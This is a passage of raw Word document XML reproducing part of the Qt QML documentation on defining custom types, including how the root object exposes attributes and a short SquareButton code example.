          <w:rFonts w:ascii="Arial" w:hAnsi="Arial" w:cs="Arial"/>
          <w:color w:val="404244"/>
          <w:lang w:val="en-US"/>
        </w:rPr>
        <w:t> </w:t>
      </w:r>
      <w:r w:rsidRPr="00187F1A">
        <w:rPr>
          <w:rFonts w:ascii="Arial" w:hAnsi="Arial" w:cs="Arial"/>
          <w:color w:val="404244"/>
          <w:lang w:val="en-US"/>
        </w:rPr>
        <w:t>was not in the same directory as</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myapplication.qml</w:t>
      </w:r>
      <w:r w:rsidRPr="00187F1A">
        <w:rPr>
          <w:rFonts w:ascii="Arial" w:hAnsi="Arial" w:cs="Arial"/>
          <w:color w:val="404244"/>
          <w:lang w:val="en-US"/>
        </w:rPr>
        <w:t>, the</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w:t>
      </w:r>
      <w:r w:rsidRPr="00187F1A">
        <w:rPr>
          <w:rStyle w:val="apple-converted-space"/>
          <w:rFonts w:ascii="Arial" w:hAnsi="Arial" w:cs="Arial"/>
          <w:color w:val="404244"/>
          <w:lang w:val="en-US"/>
        </w:rPr>
        <w:t> </w:t>
      </w:r>
      <w:r w:rsidRPr="00187F1A">
        <w:rPr>
          <w:rFonts w:ascii="Arial" w:hAnsi="Arial" w:cs="Arial"/>
          <w:color w:val="404244"/>
          <w:lang w:val="en-US"/>
        </w:rPr>
        <w:t>type would need to be specifically made available through an</w:t>
      </w:r>
      <w:r w:rsidRPr="00187F1A">
        <w:rPr>
          <w:rStyle w:val="apple-converted-space"/>
          <w:rFonts w:ascii="Arial" w:hAnsi="Arial" w:cs="Arial"/>
          <w:color w:val="404244"/>
          <w:lang w:val="en-US"/>
        </w:rPr>
        <w:t> </w:t>
      </w:r>
      <w:r w:rsidRPr="00DA77C2">
        <w:rPr>
          <w:rFonts w:ascii="Arial" w:hAnsi="Arial" w:cs="Arial"/>
          <w:i/>
          <w:iCs/>
          <w:color w:val="404244"/>
          <w:highlight w:val="yellow"/>
          <w:bdr w:val="none" w:sz="0" w:space="0" w:color="auto" w:frame="1"/>
          <w:lang w:val="en-US"/>
        </w:rPr>
        <w:t>import</w:t>
      </w:r>
      <w:r w:rsidRPr="00DA77C2">
        <w:rPr>
          <w:rStyle w:val="apple-converted-space"/>
          <w:rFonts w:ascii="Arial" w:hAnsi="Arial" w:cs="Arial"/>
          <w:color w:val="404244"/>
          <w:highlight w:val="yellow"/>
          <w:lang w:val="en-US"/>
        </w:rPr>
        <w:t> </w:t>
      </w:r>
      <w:r w:rsidRPr="00DA77C2">
        <w:rPr>
          <w:rFonts w:ascii="Arial" w:hAnsi="Arial" w:cs="Arial"/>
          <w:color w:val="404244"/>
          <w:highlight w:val="yellow"/>
          <w:lang w:val="en-US"/>
        </w:rPr>
        <w:t>statement</w:t>
      </w:r>
      <w:r w:rsidRPr="00187F1A">
        <w:rPr>
          <w:rFonts w:ascii="Arial" w:hAnsi="Arial" w:cs="Arial"/>
          <w:color w:val="404244"/>
          <w:lang w:val="en-US"/>
        </w:rPr>
        <w:t xml:space="preserve"> in</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myapplication.qml</w:t>
      </w:r>
      <w:r w:rsidRPr="00187F1A">
        <w:rPr>
          <w:rFonts w:ascii="Arial" w:hAnsi="Arial" w:cs="Arial"/>
          <w:color w:val="404244"/>
          <w:lang w:val="en-US"/>
        </w:rPr>
        <w:t xml:space="preserve">. It </w:t>
      </w:r>
      <w:r w:rsidRPr="00DA77C2">
        <w:rPr>
          <w:rFonts w:ascii="Arial" w:hAnsi="Arial" w:cs="Arial"/>
          <w:color w:val="404244"/>
          <w:highlight w:val="yellow"/>
          <w:lang w:val="en-US"/>
        </w:rPr>
        <w:t>could be imported</w:t>
      </w:r>
      <w:r w:rsidRPr="00187F1A">
        <w:rPr>
          <w:rFonts w:ascii="Arial" w:hAnsi="Arial" w:cs="Arial"/>
          <w:color w:val="404244"/>
          <w:lang w:val="en-US"/>
        </w:rPr>
        <w:t xml:space="preserve"> from a </w:t>
      </w:r>
      <w:r w:rsidRPr="00DA77C2">
        <w:rPr>
          <w:rFonts w:ascii="Arial" w:hAnsi="Arial" w:cs="Arial"/>
          <w:color w:val="404244"/>
          <w:highlight w:val="yellow"/>
          <w:lang w:val="en-US"/>
        </w:rPr>
        <w:t>relative path</w:t>
      </w:r>
      <w:r w:rsidRPr="00187F1A">
        <w:rPr>
          <w:rFonts w:ascii="Arial" w:hAnsi="Arial" w:cs="Arial"/>
          <w:color w:val="404244"/>
          <w:lang w:val="en-US"/>
        </w:rPr>
        <w:t xml:space="preserve"> on the file system, or </w:t>
      </w:r>
      <w:r w:rsidRPr="00DA77C2">
        <w:rPr>
          <w:rFonts w:ascii="Arial" w:hAnsi="Arial" w:cs="Arial"/>
          <w:color w:val="404244"/>
          <w:highlight w:val="yellow"/>
          <w:lang w:val="en-US"/>
        </w:rPr>
        <w:t>as an installed module</w:t>
      </w:r>
      <w:r w:rsidRPr="00187F1A">
        <w:rPr>
          <w:rFonts w:ascii="Arial" w:hAnsi="Arial" w:cs="Arial"/>
          <w:color w:val="404244"/>
          <w:lang w:val="en-US"/>
        </w:rPr>
        <w:t>; see</w:t>
      </w:r>
      <w:r w:rsidRPr="00187F1A">
        <w:rPr>
          <w:rStyle w:val="apple-converted-space"/>
          <w:rFonts w:ascii="Arial" w:hAnsi="Arial" w:cs="Arial"/>
          <w:color w:val="404244"/>
          <w:lang w:val="en-US"/>
        </w:rPr>
        <w:t> </w:t>
      </w:r>
      <w:hyperlink r:id="rId171" w:history="1">
        <w:r w:rsidRPr="00187F1A">
          <w:rPr>
            <w:rStyle w:val="a3"/>
            <w:rFonts w:ascii="Arial" w:hAnsi="Arial" w:cs="Arial"/>
            <w:color w:val="17A81A"/>
            <w:u w:val="none"/>
            <w:bdr w:val="none" w:sz="0" w:space="0" w:color="auto" w:frame="1"/>
            <w:lang w:val="en-US"/>
          </w:rPr>
          <w:t>module</w:t>
        </w:r>
      </w:hyperlink>
      <w:r w:rsidRPr="00187F1A">
        <w:rPr>
          <w:rStyle w:val="apple-converted-space"/>
          <w:rFonts w:ascii="Arial" w:hAnsi="Arial" w:cs="Arial"/>
          <w:color w:val="404244"/>
          <w:lang w:val="en-US"/>
        </w:rPr>
        <w:t> </w:t>
      </w:r>
      <w:r w:rsidRPr="00187F1A">
        <w:rPr>
          <w:rFonts w:ascii="Arial" w:hAnsi="Arial" w:cs="Arial"/>
          <w:color w:val="404244"/>
          <w:lang w:val="en-US"/>
        </w:rPr>
        <w:t>for more details.</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="00187F1A" w:rsidRPr="00187F1A" w:rsidRDefault="00187F1A" w:rsidP="00944C21">
      <w:pPr>
        <w:pStyle w:val="5"/>
        <w:rPr>
          <w:rFonts w:ascii="Arial" w:hAnsi="Arial" w:cs="Arial"/>
          <w:b w:val="0"/>
          <w:bCs w:val="0"/>
          <w:color w:val="404244"/>
          <w:sz w:val="24"/>
          <w:szCs w:val="24"/>
          <w:lang w:val="en-US"/>
        </w:rPr>
      </w:pPr>
      <w:bookmarkStart w:id="244" w:name="accessible-attributes-of-custom-types"/>
      <w:bookmarkStart w:id="245" w:name="_Toc483000584"/>
      <w:bookmarkStart w:id="246" w:name="_Toc483003605"/>
      <w:bookmarkStart w:id="247" w:name="_Toc483603936"/>
      <w:bookmarkStart w:id="248" w:name="_Toc483605156"/>
      <w:bookmarkEnd w:id="244"/>
      <w:r w:rsidRPr="00944C21">
        <w:rPr>
          <w:rFonts w:ascii="Arial" w:hAnsi="Arial" w:cs="Arial"/>
          <w:b w:val="0"/>
          <w:bCs w:val="0"/>
          <w:color w:val="404244"/>
          <w:sz w:val="24"/>
          <w:szCs w:val="24"/>
          <w:lang w:val="en-US"/>
        </w:rPr>
        <w:t>Accessible Attributes of Custom Types</w:t>
      </w:r>
      <w:bookmarkEnd w:id="245"/>
      <w:bookmarkEnd w:id="246"/>
      <w:bookmarkEnd w:id="247"/>
      <w:bookmarkEnd w:id="248"/>
    </w:p>
    <w:p w:rsidR="00187F1A" w:rsidRPr="00187F1A" w:rsidRDefault="00187F1A" w:rsidP="00187F1A">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highlight w:val="yellow"/>
          <w:lang w:val="en-US"/>
        </w:rPr>
        <w:t>The</w:t>
      </w:r>
      <w:r w:rsidRPr="00DA77C2">
        <w:rPr>
          <w:rStyle w:val="apple-converted-space"/>
          <w:rFonts w:ascii="Arial" w:hAnsi="Arial" w:cs="Arial"/>
          <w:color w:val="404244"/>
          <w:highlight w:val="yellow"/>
          <w:lang w:val="en-US"/>
        </w:rPr>
        <w:t> </w:t>
      </w:r>
      <w:r w:rsidRPr="00DA77C2">
        <w:rPr>
          <w:rFonts w:ascii="Arial" w:hAnsi="Arial" w:cs="Arial"/>
          <w:b/>
          <w:bCs/>
          <w:color w:val="404244"/>
          <w:highlight w:val="yellow"/>
          <w:bdr w:val="none" w:sz="0" w:space="0" w:color="auto" w:frame="1"/>
          <w:lang w:val="en-US"/>
        </w:rPr>
        <w:t>root object</w:t>
      </w:r>
      <w:r w:rsidRPr="00DA77C2">
        <w:rPr>
          <w:rStyle w:val="apple-converted-space"/>
          <w:rFonts w:ascii="Arial" w:hAnsi="Arial" w:cs="Arial"/>
          <w:color w:val="404244"/>
          <w:highlight w:val="yellow"/>
          <w:lang w:val="en-US"/>
        </w:rPr>
        <w:t> </w:t>
      </w:r>
      <w:r w:rsidRPr="00944C21">
        <w:rPr>
          <w:rFonts w:ascii="Arial" w:hAnsi="Arial" w:cs="Arial"/>
          <w:color w:val="404244"/>
          <w:highlight w:val="yellow"/>
          <w:lang w:val="en-US"/>
        </w:rPr>
        <w:t>definition in a .qml file</w:t>
      </w:r>
      <w:r w:rsidRPr="00944C21">
        <w:rPr>
          <w:rStyle w:val="apple-converted-space"/>
          <w:rFonts w:ascii="Arial" w:hAnsi="Arial" w:cs="Arial"/>
          <w:color w:val="404244"/>
          <w:highlight w:val="yellow"/>
          <w:lang w:val="en-US"/>
        </w:rPr>
        <w:t> </w:t>
      </w:r>
      <w:r w:rsidRPr="00944C21">
        <w:rPr>
          <w:rFonts w:ascii="Arial" w:hAnsi="Arial" w:cs="Arial"/>
          <w:b/>
          <w:bCs/>
          <w:color w:val="404244"/>
          <w:highlight w:val="yellow"/>
          <w:bdr w:val="none" w:sz="0" w:space="0" w:color="auto" w:frame="1"/>
          <w:lang w:val="en-US"/>
        </w:rPr>
        <w:t>defines the attributes that are available for a QML type</w:t>
      </w:r>
      <w:r w:rsidRPr="00944C21">
        <w:rPr>
          <w:rFonts w:ascii="Arial" w:hAnsi="Arial" w:cs="Arial"/>
          <w:color w:val="404244"/>
          <w:highlight w:val="yellow"/>
          <w:lang w:val="en-US"/>
        </w:rPr>
        <w:t>.</w:t>
      </w:r>
      <w:r w:rsidRPr="00187F1A">
        <w:rPr>
          <w:rFonts w:ascii="Arial" w:hAnsi="Arial" w:cs="Arial"/>
          <w:color w:val="404244"/>
          <w:lang w:val="en-US"/>
        </w:rPr>
        <w:t xml:space="preserve"> All properties, signals and methods that belong to this root object - whether they are custom declared, or come from the QML type of the root object - are externally accessible and can be read and modified for objects of this type.</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="00187F1A" w:rsidRPr="00187F1A" w:rsidRDefault="00187F1A" w:rsidP="00187F1A">
      <w:pPr>
        <w:pStyle w:val="a4"/>
        <w:spacing w:before="0" w:beforeAutospacing="0" w:after="0" w:afterAutospacing="0" w:line="374" w:lineRule="atLeast"/>
        <w:textAlignment w:val="baseline"/>
        <w:rPr>
          <w:rFonts w:ascii="Arial" w:hAnsi="Arial" w:cs="Arial"/>
          <w:color w:val="404244"/>
          <w:lang w:val="en-US"/>
        </w:rPr>
      </w:pPr>
      <w:r w:rsidRPr="00187F1A">
        <w:rPr>
          <w:rFonts w:ascii="Arial" w:hAnsi="Arial" w:cs="Arial"/>
          <w:color w:val="404244"/>
          <w:lang w:val="en-US"/>
        </w:rPr>
        <w:t xml:space="preserve">For </w:t>
      </w:r>
      <w:r w:rsidRPr="00944C21">
        <w:rPr>
          <w:rFonts w:ascii="Arial" w:hAnsi="Arial" w:cs="Arial"/>
          <w:color w:val="404244"/>
          <w:highlight w:val="yellow"/>
          <w:lang w:val="en-US"/>
        </w:rPr>
        <w:t>example</w:t>
      </w:r>
      <w:r w:rsidRPr="00187F1A">
        <w:rPr>
          <w:rFonts w:ascii="Arial" w:hAnsi="Arial" w:cs="Arial"/>
          <w:color w:val="404244"/>
          <w:lang w:val="en-US"/>
        </w:rPr>
        <w:t>, the root object type in the</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SquareButton.qml</w:t>
      </w:r>
      <w:r w:rsidRPr="00187F1A">
        <w:rPr>
          <w:rStyle w:val="apple-converted-space"/>
          <w:rFonts w:ascii="Arial" w:hAnsi="Arial" w:cs="Arial"/>
          <w:color w:val="404244"/>
          <w:lang w:val="en-US"/>
        </w:rPr>
        <w:t> </w:t>
      </w:r>
      <w:r w:rsidRPr="00187F1A">
        <w:rPr>
          <w:rFonts w:ascii="Arial" w:hAnsi="Arial" w:cs="Arial"/>
          <w:color w:val="404244"/>
          <w:lang w:val="en-US"/>
        </w:rPr>
        <w:t>file above is</w:t>
      </w:r>
      <w:r w:rsidRPr="00187F1A">
        <w:rPr>
          <w:rStyle w:val="apple-converted-space"/>
          <w:rFonts w:ascii="Arial" w:hAnsi="Arial" w:cs="Arial"/>
          <w:color w:val="404244"/>
          <w:lang w:val="en-US"/>
        </w:rPr>
        <w:t> </w:t>
      </w:r>
      <w:hyperlink r:id="rId172" w:history="1">
        <w:r w:rsidRPr="00187F1A">
          <w:rPr>
            <w:rStyle w:val="a3"/>
            <w:rFonts w:ascii="Arial" w:hAnsi="Arial" w:cs="Arial"/>
            <w:color w:val="17A81A"/>
            <w:u w:val="none"/>
            <w:bdr w:val="none" w:sz="0" w:space="0" w:color="auto" w:frame="1"/>
            <w:lang w:val="en-US"/>
          </w:rPr>
          <w:t>Rectangle</w:t>
        </w:r>
      </w:hyperlink>
      <w:r w:rsidRPr="00187F1A">
        <w:rPr>
          <w:rFonts w:ascii="Arial" w:hAnsi="Arial" w:cs="Arial"/>
          <w:color w:val="404244"/>
          <w:lang w:val="en-US"/>
        </w:rPr>
        <w:t>. This means any properties defined by the</w:t>
      </w:r>
      <w:r w:rsidRPr="00187F1A">
        <w:rPr>
          <w:rStyle w:val="apple-converted-space"/>
          <w:rFonts w:ascii="Arial" w:hAnsi="Arial" w:cs="Arial"/>
          <w:color w:val="404244"/>
          <w:lang w:val="en-US"/>
        </w:rPr>
        <w:t> </w:t>
      </w:r>
      <w:hyperlink r:id="rId173" w:history="1">
        <w:r w:rsidRPr="00187F1A">
          <w:rPr>
            <w:rStyle w:val="a3"/>
            <w:rFonts w:ascii="Arial" w:hAnsi="Arial" w:cs="Arial"/>
            <w:color w:val="17A81A"/>
            <w:u w:val="none"/>
            <w:bdr w:val="none" w:sz="0" w:space="0" w:color="auto" w:frame="1"/>
            <w:lang w:val="en-US"/>
          </w:rPr>
          <w:t>Rectangle</w:t>
        </w:r>
      </w:hyperlink>
      <w:r w:rsidRPr="00187F1A">
        <w:rPr>
          <w:rStyle w:val="apple-converted-space"/>
          <w:rFonts w:ascii="Arial" w:hAnsi="Arial" w:cs="Arial"/>
          <w:color w:val="404244"/>
          <w:lang w:val="en-US"/>
        </w:rPr>
        <w:t> </w:t>
      </w:r>
      <w:r w:rsidRPr="00187F1A">
        <w:rPr>
          <w:rFonts w:ascii="Arial" w:hAnsi="Arial" w:cs="Arial"/>
          <w:color w:val="404244"/>
          <w:lang w:val="en-US"/>
        </w:rPr>
        <w:t>type can be modified for a</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w:t>
      </w:r>
      <w:r w:rsidRPr="00187F1A">
        <w:rPr>
          <w:rStyle w:val="apple-converted-space"/>
          <w:rFonts w:ascii="Arial" w:hAnsi="Arial" w:cs="Arial"/>
          <w:color w:val="404244"/>
          <w:lang w:val="en-US"/>
        </w:rPr>
        <w:t> </w:t>
      </w:r>
      <w:r w:rsidRPr="00187F1A">
        <w:rPr>
          <w:rFonts w:ascii="Arial" w:hAnsi="Arial" w:cs="Arial"/>
          <w:color w:val="404244"/>
          <w:lang w:val="en-US"/>
        </w:rPr>
        <w:t>object. The code below defines three</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w:t>
      </w:r>
      <w:r w:rsidRPr="00187F1A">
        <w:rPr>
          <w:rStyle w:val="apple-converted-space"/>
          <w:rFonts w:ascii="Arial" w:hAnsi="Arial" w:cs="Arial"/>
          <w:color w:val="404244"/>
          <w:lang w:val="en-US"/>
        </w:rPr>
        <w:t> </w:t>
      </w:r>
      <w:r w:rsidRPr="00187F1A">
        <w:rPr>
          <w:rFonts w:ascii="Arial" w:hAnsi="Arial" w:cs="Arial"/>
          <w:color w:val="404244"/>
          <w:lang w:val="en-US"/>
        </w:rPr>
        <w:t>objects with customized values for some of the properties of the root</w:t>
      </w:r>
      <w:r w:rsidRPr="00187F1A">
        <w:rPr>
          <w:rStyle w:val="apple-converted-space"/>
          <w:rFonts w:ascii="Arial" w:hAnsi="Arial" w:cs="Arial"/>
          <w:color w:val="404244"/>
          <w:lang w:val="en-US"/>
        </w:rPr>
        <w:t> </w:t>
      </w:r>
      <w:hyperlink r:id="rId174" w:history="1">
        <w:r w:rsidRPr="00187F1A">
          <w:rPr>
            <w:rStyle w:val="a3"/>
            <w:rFonts w:ascii="Arial" w:hAnsi="Arial" w:cs="Arial"/>
            <w:color w:val="17A81A"/>
            <w:u w:val="none"/>
            <w:bdr w:val="none" w:sz="0" w:space="0" w:color="auto" w:frame="1"/>
            <w:lang w:val="en-US"/>
          </w:rPr>
          <w:t>Rectangle</w:t>
        </w:r>
      </w:hyperlink>
      <w:r w:rsidRPr="00187F1A">
        <w:rPr>
          <w:rStyle w:val="apple-converted-space"/>
          <w:rFonts w:ascii="Arial" w:hAnsi="Arial" w:cs="Arial"/>
          <w:color w:val="404244"/>
          <w:lang w:val="en-US"/>
        </w:rPr>
        <w:t> </w:t>
      </w:r>
      <w:r w:rsidRPr="00187F1A">
        <w:rPr>
          <w:rFonts w:ascii="Arial" w:hAnsi="Arial" w:cs="Arial"/>
          <w:color w:val="404244"/>
          <w:lang w:val="en-US"/>
        </w:rPr>
        <w:t>object of the</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w:t>
      </w:r>
      <w:r w:rsidRPr="00187F1A">
        <w:rPr>
          <w:rStyle w:val="apple-converted-space"/>
          <w:rFonts w:ascii="Arial" w:hAnsi="Arial" w:cs="Arial"/>
          <w:color w:val="404244"/>
          <w:lang w:val="en-US"/>
        </w:rPr>
        <w:t> </w:t>
      </w:r>
      <w:r w:rsidRPr="00187F1A">
        <w:rPr>
          <w:rFonts w:ascii="Arial" w:hAnsi="Arial" w:cs="Arial"/>
          <w:color w:val="404244"/>
          <w:lang w:val="en-US"/>
        </w:rPr>
        <w:t>type:</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com"/>
          <w:rFonts w:ascii="Droid Sans Mono" w:hAnsi="Droid Sans Mono"/>
          <w:color w:val="55FFFF"/>
          <w:sz w:val="24"/>
          <w:szCs w:val="24"/>
          <w:bdr w:val="none" w:sz="0" w:space="0" w:color="auto" w:frame="1"/>
          <w:lang w:val="en-US"/>
        </w:rPr>
        <w:lastRenderedPageBreak/>
        <w:t>// application.qml</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kwd"/>
          <w:rFonts w:ascii="Droid Sans Mono" w:hAnsi="Droid Sans Mono"/>
          <w:color w:val="FFFF55"/>
          <w:sz w:val="24"/>
          <w:szCs w:val="24"/>
          <w:bdr w:val="none" w:sz="0" w:space="0" w:color="auto" w:frame="1"/>
          <w:lang w:val="en-US"/>
        </w:rPr>
        <w:t>import</w:t>
      </w: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lang w:val="en-US"/>
        </w:rPr>
        <w:t>QtQuick</w:t>
      </w:r>
      <w:r w:rsidRPr="00187F1A">
        <w:rPr>
          <w:rStyle w:val="pln"/>
          <w:rFonts w:ascii="Droid Sans Mono" w:hAnsi="Droid Sans Mono"/>
          <w:color w:val="FFFFFF"/>
          <w:sz w:val="24"/>
          <w:szCs w:val="24"/>
          <w:bdr w:val="none" w:sz="0" w:space="0" w:color="auto" w:frame="1"/>
          <w:lang w:val="en-US"/>
        </w:rPr>
        <w:t xml:space="preserve"> </w:t>
      </w:r>
      <w:r w:rsidRPr="00187F1A">
        <w:rPr>
          <w:rStyle w:val="lit"/>
          <w:rFonts w:ascii="Droid Sans Mono" w:hAnsi="Droid Sans Mono"/>
          <w:color w:val="FF55FF"/>
          <w:sz w:val="24"/>
          <w:szCs w:val="24"/>
          <w:bdr w:val="none" w:sz="0" w:space="0" w:color="auto" w:frame="1"/>
          <w:lang w:val="en-US"/>
        </w:rPr>
        <w:t>2.0</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typ"/>
          <w:rFonts w:ascii="Droid Sans Mono" w:hAnsi="Droid Sans Mono"/>
          <w:color w:val="4F9D08"/>
          <w:sz w:val="24"/>
          <w:szCs w:val="24"/>
          <w:bdr w:val="none" w:sz="0" w:space="0" w:color="auto" w:frame="1"/>
          <w:lang w:val="en-US"/>
        </w:rPr>
        <w:t>Column</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lang w:val="en-US"/>
        </w:rPr>
        <w:t>SquareButton</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side</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lit"/>
          <w:rFonts w:ascii="Droid Sans Mono" w:hAnsi="Droid Sans Mono"/>
          <w:color w:val="FF55FF"/>
          <w:sz w:val="24"/>
          <w:szCs w:val="24"/>
          <w:bdr w:val="none" w:sz="0" w:space="0" w:color="auto" w:frame="1"/>
          <w:lang w:val="en-US"/>
        </w:rPr>
        <w:t>50</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lang w:val="en-US"/>
        </w:rPr>
        <w:t>SquareButton</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x</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lit"/>
          <w:rFonts w:ascii="Droid Sans Mono" w:hAnsi="Droid Sans Mono"/>
          <w:color w:val="FF55FF"/>
          <w:sz w:val="24"/>
          <w:szCs w:val="24"/>
          <w:bdr w:val="none" w:sz="0" w:space="0" w:color="auto" w:frame="1"/>
          <w:lang w:val="en-US"/>
        </w:rPr>
        <w:t>50</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color</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str"/>
          <w:rFonts w:ascii="Droid Sans Mono" w:hAnsi="Droid Sans Mono"/>
          <w:color w:val="AAAAAA"/>
          <w:sz w:val="24"/>
          <w:szCs w:val="24"/>
          <w:bdr w:val="none" w:sz="0" w:space="0" w:color="auto" w:frame="1"/>
          <w:lang w:val="en-US"/>
        </w:rPr>
        <w:t>"blue"</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rPr>
      </w:pP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rPr>
        <w:t>SquareButton</w:t>
      </w:r>
      <w:r w:rsidRPr="00187F1A">
        <w:rPr>
          <w:rStyle w:val="pln"/>
          <w:rFonts w:ascii="Droid Sans Mono" w:hAnsi="Droid Sans Mono"/>
          <w:color w:val="FFFFFF"/>
          <w:sz w:val="24"/>
          <w:szCs w:val="24"/>
          <w:bdr w:val="none" w:sz="0" w:space="0" w:color="auto" w:frame="1"/>
        </w:rPr>
        <w:t xml:space="preserve"> </w:t>
      </w:r>
      <w:r w:rsidRPr="00187F1A">
        <w:rPr>
          <w:rStyle w:val="pun"/>
          <w:rFonts w:ascii="Droid Sans Mono" w:hAnsi="Droid Sans Mono"/>
          <w:color w:val="FFFFFF"/>
          <w:sz w:val="24"/>
          <w:szCs w:val="24"/>
          <w:bdr w:val="none" w:sz="0" w:space="0" w:color="auto" w:frame="1"/>
        </w:rPr>
        <w:t>{</w:t>
      </w:r>
      <w:r w:rsidRPr="00187F1A">
        <w:rPr>
          <w:rStyle w:val="pln"/>
          <w:rFonts w:ascii="Droid Sans Mono" w:hAnsi="Droid Sans Mono"/>
          <w:color w:val="FFFFFF"/>
          <w:sz w:val="24"/>
          <w:szCs w:val="24"/>
          <w:bdr w:val="none" w:sz="0" w:space="0" w:color="auto" w:frame="1"/>
        </w:rPr>
        <w:t xml:space="preserve"> radius</w:t>
      </w:r>
      <w:r w:rsidRPr="00187F1A">
        <w:rPr>
          <w:rStyle w:val="pun"/>
          <w:rFonts w:ascii="Droid Sans Mono" w:hAnsi="Droid Sans Mono"/>
          <w:color w:val="FFFFFF"/>
          <w:sz w:val="24"/>
          <w:szCs w:val="24"/>
          <w:bdr w:val="none" w:sz="0" w:space="0" w:color="auto" w:frame="1"/>
        </w:rPr>
        <w:t>:</w:t>
      </w:r>
      <w:r w:rsidRPr="00187F1A">
        <w:rPr>
          <w:rStyle w:val="pln"/>
          <w:rFonts w:ascii="Droid Sans Mono" w:hAnsi="Droid Sans Mono"/>
          <w:color w:val="FFFFFF"/>
          <w:sz w:val="24"/>
          <w:szCs w:val="24"/>
          <w:bdr w:val="none" w:sz="0" w:space="0" w:color="auto" w:frame="1"/>
        </w:rPr>
        <w:t xml:space="preserve"> </w:t>
      </w:r>
      <w:r w:rsidRPr="00187F1A">
        <w:rPr>
          <w:rStyle w:val="lit"/>
          <w:rFonts w:ascii="Droid Sans Mono" w:hAnsi="Droid Sans Mono"/>
          <w:color w:val="FF55FF"/>
          <w:sz w:val="24"/>
          <w:szCs w:val="24"/>
          <w:bdr w:val="none" w:sz="0" w:space="0" w:color="auto" w:frame="1"/>
        </w:rPr>
        <w:t>10</w:t>
      </w:r>
      <w:r w:rsidRPr="00187F1A">
        <w:rPr>
          <w:rStyle w:val="pln"/>
          <w:rFonts w:ascii="Droid Sans Mono" w:hAnsi="Droid Sans Mono"/>
          <w:color w:val="FFFFFF"/>
          <w:sz w:val="24"/>
          <w:szCs w:val="24"/>
          <w:bdr w:val="none" w:sz="0" w:space="0" w:color="auto" w:frame="1"/>
        </w:rPr>
        <w:t xml:space="preserve"> </w:t>
      </w:r>
      <w:r w:rsidRPr="00187F1A">
        <w:rPr>
          <w:rStyle w:val="pun"/>
          <w:rFonts w:ascii="Droid Sans Mono" w:hAnsi="Droid Sans Mono"/>
          <w:color w:val="FFFFFF"/>
          <w:sz w:val="24"/>
          <w:szCs w:val="24"/>
          <w:bdr w:val="none" w:sz="0" w:space="0" w:color="auto" w:frame="1"/>
        </w:rPr>
        <w:t>}</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="00187F1A" w:rsidRPr="00187F1A" w:rsidRDefault="00187F1A" w:rsidP="00187F1A">
      <w:pPr>
        <w:pStyle w:val="HTML0"/>
        <w:shd w:val="clear" w:color="auto" w:fill="3A4055"/>
        <w:textAlignment w:val="baseline"/>
        <w:rPr>
          <w:rFonts w:ascii="Droid Sans Mono" w:hAnsi="Droid Sans Mono"/>
          <w:color w:val="FFFFFF"/>
          <w:sz w:val="24"/>
          <w:szCs w:val="24"/>
        </w:rPr>
      </w:pPr>
      <w:r w:rsidRPr="00187F1A">
        <w:rPr>
          <w:rStyle w:val="pun"/>
          <w:rFonts w:ascii="Droid Sans Mono" w:hAnsi="Droid Sans Mono"/>
          <w:color w:val="FFFFFF"/>
          <w:sz w:val="24"/>
          <w:szCs w:val="24"/>
          <w:bdr w:val="none" w:sz="0" w:space="0" w:color="auto" w:frame="1"/>
        </w:rPr>
        <w:t>}</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="00187F1A" w:rsidRPr="00187F1A" w:rsidRDefault="00187F1A" w:rsidP="00187F1A">
      <w:pPr>
        <w:pStyle w:val="centeralign"/>
        <w:spacing w:before="0" w:beforeAutospacing="0" w:after="240" w:afterAutospacing="0" w:line="374" w:lineRule="atLeast"/>
        <w:textAlignment w:val="baseline"/>
        <w:rPr>
          <w:rFonts w:ascii="Arial" w:hAnsi="Arial" w:cs="Arial"/>
          <w:color w:val="404244"/>
        </w:rPr>
      </w:pPr>
      <w:r w:rsidRPr="00187F1A">
        <w:rPr>
          <w:rFonts w:ascii="Arial" w:hAnsi="Arial" w:cs="Arial"/>
          <w:color w:val="404244"/>
        </w:rPr>
        <w:fldChar w:fldCharType="begin"/>
      </w:r>
      <w:r w:rsidRPr="00187F1A">
        <w:rPr>
          <w:rFonts w:ascii="Arial" w:hAnsi="Arial" w:cs="Arial"/>
          <w:color w:val="404244"/>
        </w:rPr>
        <w:instrText xml:space="preserve"> INCLUDEPICTURE "http://doc.qt.io/qt-5/images/documents-definetypes-attributes.png" \* MERGEFORMATINET </w:instrText>
      </w:r>
      <w:r w:rsidRPr="00187F1A">
        <w:rPr>
          <w:rFonts w:ascii="Arial" w:hAnsi="Arial" w:cs="Arial"/>
          <w:color w:val="404244"/>
        </w:rPr>
        <w:fldChar w:fldCharType="separate"/>
      </w:r>
      <w:r w:rsidR="00B307B1">
        <w:rPr>
          <w:rFonts w:ascii="Arial" w:hAnsi="Arial" w:cs="Arial"/>
          <w:color w:val="404244"/>
        </w:rPr>
        <w:fldChar w:fldCharType="begin"/>
      </w:r>
      <w:r w:rsidR="00B307B1">
        <w:rPr>
          <w:rFonts w:ascii="Arial" w:hAnsi="Arial" w:cs="Arial"/>
          <w:color w:val="404244"/>
        </w:rPr>
        <w:instrText xml:space="preserve"> INCLUDEPICTURE  "http://doc.qt.io/qt-5/images/documents-definetypes-attributes.png" \* MERGEFORMATINET </w:instrText>
      </w:r>
      <w:r w:rsidR="00B307B1">
        <w:rPr>
          <w:rFonts w:ascii="Arial" w:hAnsi="Arial" w:cs="Arial"/>
          <w:color w:val="404244"/>
        </w:rPr>
        <w:fldChar w:fldCharType="separate"/>
      </w:r>
      <w:r w:rsidR="00CD015D">
        <w:rPr>
          <w:rFonts w:ascii="Arial" w:hAnsi="Arial" w:cs="Arial"/>
          <w:color w:val="404244"/>
        </w:rPr>
        <w:fldChar w:fldCharType="begin"/>
      </w:r>
      <w:r w:rsidR="00CD015D">
        <w:rPr>
          <w:rFonts w:ascii="Arial" w:hAnsi="Arial" w:cs="Arial"/>
          <w:color w:val="404244"/>
        </w:rPr>
        <w:instrText xml:space="preserve"> INCLUDEPICTURE  "http://doc.qt.io/qt-5/images/documents-definetypes-attributes.png" \* MERGEFORMATINET </w:instrText>
      </w:r>
      <w:r w:rsidR="00CD015D">
        <w:rPr>
          <w:rFonts w:ascii="Arial" w:hAnsi="Arial" w:cs="Arial"/>
          <w:color w:val="404244"/>
        </w:rPr>
        <w:fldChar w:fldCharType="separate"/>
      </w:r>
      <w:r w:rsidR="00790650">
        <w:rPr>
